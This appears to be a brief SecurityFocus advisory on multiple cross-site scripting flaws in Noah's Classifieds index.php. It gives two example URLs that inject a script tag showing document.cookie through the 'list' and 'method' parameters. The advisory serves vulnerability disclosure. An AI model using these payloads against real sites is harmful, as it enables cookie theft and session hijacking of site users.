Noah's Classifieds Index.PHP Multiple Cross-Site Scripting Vulnerabilities


An exploit is not required.

Examples have been provided:


http://www.example.com/classifieds/index.php?method=showdetails&list=%3Cscript%3Ealert(document.cookie)%3C/script%3Eadvertisement&rollid=1
http://www.example.com/classifieds/index.php?method=%3Cscript%3Ealert(document.cookie)%3B%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus